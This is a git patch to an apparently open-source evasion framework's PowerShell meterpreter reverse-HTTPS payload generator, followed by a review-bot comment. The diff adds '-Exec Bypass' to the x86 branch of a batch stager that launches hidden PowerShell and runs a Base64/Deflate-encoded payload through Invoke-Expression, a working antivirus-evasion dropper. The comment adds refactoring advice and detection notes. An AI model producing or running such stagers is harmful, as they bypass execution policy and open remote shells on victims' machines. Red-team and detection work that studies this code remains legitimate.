From 7dce0451efedecfb983cc9d9733127d240f4f00d Mon Sep 17 00:00:00 2001
From: DenFox93
Date: Mon, 21 Dec 2020 13:20:45 +0100
Subject: [PATCH] Update rev_https.py "-Exec Bypass" not present in x86 command
---
 tools/evasion/payloads/powershell/meterpreter/rev_https.py | 2 +-
 1 file changed, 1 insertion(+), 1 deletion(-)
diff --git a/tools/evasion/payloads/powershell/meterpreter/rev_https.py b/tools/evasion/payloads/powershell/meterpreter/rev_https.py
index 310c74c..6003c70 100644
--- a/tools/evasion/payloads/powershell/meterpreter/rev_https.py
+++ b/tools/evasion/payloads/powershell/meterpreter/rev_https.py
@@ -75,7 +75,7 @@ def generate(self):
 encoded = evasion_helpers.deflate(baseString)
 payload_code = "@echo off\n"
 payload_code += "if %PROCESSOR_ARCHITECTURE%==x86 ("
- payload_code += "powershell.exe -NoP -NonI -W Hidden -Command \"Invoke-Expression $(New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream (,$([Convert]::FromBase64String(\\\"%s\\\")))), [IO.Compression.CompressionMode]::Decompress)), [Text.Encoding]::ASCII)).ReadToEnd();\"" % (encoded)
+ payload_code += "powershell.exe -NoP -NonI -W Hidden -Exec Bypass -Command \"Invoke-Expression $(New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream (,$([Convert]::FromBase64String(\\\"%s\\\")))), [IO.Compression.CompressionMode]::Decompress)), [Text.Encoding]::ASCII)).ReadToEnd();\"" % (encoded)
 payload_code += ") else ("
 payload_code += "%%WinDir%%\\syswow64\\windowspowershell\\v1.0\\powershell.exe -NoP -NonI -W Hidden -Exec Bypass -Command \"Invoke-Expression $(New-Object IO.StreamReader ($(New-Object IO.Compression.DeflateStream ($(New-Object IO.MemoryStream (,$([Convert]::FromBase64String(\\\"%s\\\")))), [IO.Compression.CompressionMode]::Decompress)), [Text.Encoding]::ASCII)).ReadToEnd();\")" % (encoded)
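Review bot: The two architecture branches in generate() repeat the same long command string and differ only in the executable path, which is presumably how the x86 branch came to lack a flag the syswow64 branch already had; nothing in the new code stops them drifting apart again. Building the shared argument string once and formatting it into both branches would remove the duplication, and at minimum a comment above the `if %PROCESSOR_ARCHITECTURE%==x86 (` line such as `# both branches must pass identical PowerShell flags; only the executable path differs` would record the intent. For readers on the detection side, after this change both branches emit the same `-NoP -NonI -W Hidden -Exec Bypass` flag set ahead of a Base64/Deflate `Invoke-Expression` stager, so a single process-creation command-line rule covers both paths, and PowerShell script block logging still records the decoded script because execution policy has no effect on logging. The body of generate() starts and ends outside this hunk.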